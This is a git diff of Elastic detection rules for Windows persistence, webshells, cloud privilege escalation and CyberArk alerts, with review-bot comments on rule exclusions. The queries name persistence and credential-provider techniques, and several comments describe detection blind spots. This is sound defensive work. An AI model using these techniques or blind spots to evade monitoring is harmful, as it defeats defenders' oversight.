@@ -12,14 +12,22 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "/* Registry Path ends with backslash */\nregistry where /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\", \n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "note": "", + "query": "/* Registry Path ends with backslash */\nregistry where /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n 
\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json index c61fe5b8a17d5..de098226aca92 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json 
@@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Installation of Security Support Provider", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where\n registry.path : (\"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\", \n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "note": "", + "query": "registry where\n registry.path : (\"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
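Review bot: The rewritten `query` still hard-codes the system drive in its msiexec exclusion, `not process.executable : ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")`, while this same commit moves the Update Orchestrator rule to `?:\\Windows\\...` paths and the BITS job notify rule already uses the `?:` prefix; on a host whose system drive is not C: the exclusion never matches and every msiexec-driven write to the Lsa Security Packages keys alerts. Since the query line is being touched for whitespace anyway, switching the two entries to `?:\\Windows\\System32\\msiexec.exe` and `?:\\Windows\\SysWOW64\\msiexec.exe` keeps the exclusion style consistent across the rule set.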
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json index e852ed1e330be..cc2e5ad49b385 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via TelemetryController Scheduled Task Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"CompatTelRunner.exe\" and process.args : \"-cv*\" and\n not process.name : (\"conhost.exe\",\n \"DeviceCensus.exe\",\n \"CompatTelRunner.exe\",\n \"DismHost.exe\",\n \"rundll32.exe\",\n \"powershell.exe\")\n", "references": [ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/?utm_content=131234033&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } 
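Review bot: The exclusion list in `query` silently drops every `rundll32.exe` and `powershell.exe` child of `CompatTelRunner.exe -cv*`, which are generic script and DLL hosts rather than telemetry components, so a blanket exclusion by name removes a large part of the coverage the rule name promises; the commit adds `required_fields` for this query but leaves the allow-list as is. Presumably the two names were added to suppress benign telemetry runs; a narrower exclusion tied to the expected `process.args`, or to `process.code_signature.trusted == true` together with a Microsoft `process.code_signature.subject_name`, would keep the false-positive reduction without excluding the two hosts outright. If signature fields are added to the query, the new `required_fields` array needs matching entries for them.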
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json index 23e80df260e08..c4a8c939bf4db 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json 
@@ -12,20 +12,44 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\n \"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"C:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"C:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"C:\\\\Windows\\\\System32\\\\WerMgr.exe\"\n )\n", + "note": "", + "query": "process where event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\")\n", "references": [ 
"https://github.com/irsl/CVE-2020-1313" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", "Host", "Windows", "Threat Detection", - "Persistence" + "Persistence", + "CVE-2020-1313" ], "threat": [ { @@ -53,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json index 181a51ee552b1..6e81d9f24165c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json 
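Review bot: The new exclusion `"?:\\ProgramData\\Microsoft\\Windows\\UUS\\Packages\\*\\amd64\\MoUsoCoreWorker.exe"` introduces a wildcard path segment, and together with the switch from `C:` to `?:` the whole allow-list in the rewritten `query` now matches on executable path alone, so any process started from a matching path under `svchost.exe -k UsoSvc` is silently excluded; a path-only allow-list under a ProgramData tree is a wider blind spot than the fixed System32 paths it replaces. If the indexed data carries code-signature fields, qualifying the exclusion with a condition such as `process.code_signature.trusted == true` would keep the allow-list from resting on the path alone; this is an ECS field but whether the endpoint data here populates it cannot be seen from the hunk. Since `note` is emptied in the same hunk, a one-line explanation of why MoUsoCoreWorker.exe is expected under the UUS packages directory would help whoever tunes this rule next.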
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via WMI Event Subscription", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"wmic.exe\" or process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"create\" and\n process.args : (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json index d35fbf97ee846..2f78701a34d72 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json @@ -14,6 +14,23 @@ "references": [ "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov" ], + "required_fields": [ + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", "severity": "high", @@ -77,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json index 0839cf1c04b78..06852792e15bb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json 
@@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Webshell Detection: Script Process Child of Common Web Processes", - "note": "## Triage and analysis\n\nDetections should be investigated to identify if the activity corresponds to legitimate activity. As this rule detects post-exploitation process activity, investigations into this should be prioritized.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and \n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\")\n", + "note": "## Triage and analysis\n\nDetections should be investigated to identify if the activity corresponds to legitimate activity. 
As this rule detects post-exploitation process activity, investigations into this should be prioritized.", + "query": "process where event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and\n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\")\n", "references": [ "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json index 8d41551fa4f24..62225f6495e5c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json 
@@ -11,13 +11,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Apple Scripting Execution with Administrator Privileges", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*with administrator privileges\"\n", "references": [ "https://discussions.apple.com/thread/2266150" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -61,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json index de17b7a5b30a1..140f6bf2aa573 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json @@ -14,14 +14,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS SAML Activity", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:(iam.amazonaws.com or sts.amazonaws.com) and event.action:(Assumerolewithsaml or \nUpdateSAMLProvider) and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:(iam.amazonaws.com or sts.amazonaws.com) and event.action:(Assumerolewithsaml or\nUpdateSAMLProvider) and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "979729e7-0c52-4c4c-b71e-88103304a79f", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -72,5 +102,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json index d0685caeaeb06..12cbec0c58573 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json 
@@ -11,14 +11,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Kubernetes Rolebindings Created", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n\t(\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\" or\n\t \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\") and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n\t(\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\" or\n\t \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\") and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1c966416-60c1-436b-bfd0-e002fddbfd89", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -41,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json index 58bf98ce4e07f..eb6eb59860e92 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json 
@@ -14,14 +14,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "CyberArk Privileged Access Security Error", - "note": "## Config\n\nThe CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\nThis is a promotion rule for CyberArk error events, which are alertable events per the vendor.\nConsult vendor documentation on interpreting specific events.\n", + "note": "## Triage and analysis\n\nThis is a promotion rule for CyberArk error events, which are alertable events per the vendor.\nConsult vendor documentation on interpreting specific events.", "query": "event.dataset:cyberarkpas.audit and event.type:error\n", "references": [ "https://docs.cyberark.com/Product-Doc/OnlineHelp/PAS/Latest/en/Content/PASREF/Vault%20Audit%20Action%20Codes.htm?tocpath=Administration%7CReferences%7C_____3" ], + "related_integrations": [ + { + "package": "cyberarkpas", + "version": "2.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3f0e5410-a4bf-4e8c-bcfc-79d67a285c54", "rule_name_override": "event.action", + "setup": "The CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -59,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
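Review bot: The `related_integrations` entry `{ "package": "cyberarkpas", "version": "2.2.0" }` omits the `integration` key that the AWS (`"integration": "cloudtrail"`) and Azure (`"integration": "activitylogs"`) entries include. If the schema treats `integration` as optional for packages with a single data stream this is fine; otherwise, given the query's `event.dataset:cyberarkpas.audit`, the entry presumably wants `"integration": "audit"`. The CyberArk Recommended Monitor hunk has the same shape.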
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json index f7e3fd70757d6..14ece65425e47 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json 
@@ -14,14 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "CyberArk Privileged Access Security Recommended Monitor", - "note": "## Config\n\nThe CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\nThis is a promotion rule for CyberArk events, which the vendor recommends should be monitored.\nConsult vendor documentation on interpreting specific events.\n", + "note": "## Triage and analysis\n\nThis is a promotion rule for CyberArk events, which the vendor recommends should be monitored.\nConsult vendor documentation on interpreting specific events.", "query": "event.dataset:cyberarkpas.audit and\n event.code:(4 or 22 or 24 or 31 or 38 or 57 or 60 or 130 or 295 or 300 or 302 or\n 308 or 319 or 344 or 346 or 359 or 361 or 378 or 380 or 411) and\n not event.type:error\n", "references": [ "https://docs.cyberark.com/Product-Doc/OnlineHelp/PAS/Latest/en/Content/PASREF/Vault%20Audit%20Action%20Codes.htm?tocpath=Administration%7CReferences%7C_____3#RecommendedActionCodesforMonitoring" ], + "related_integrations": [ + { + "package": "cyberarkpas", + "version": "2.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c5f81243-56e0-47f9-b5bb-55a5ed89ba57", "rule_name_override": "event.action", + "setup": "The CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -59,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
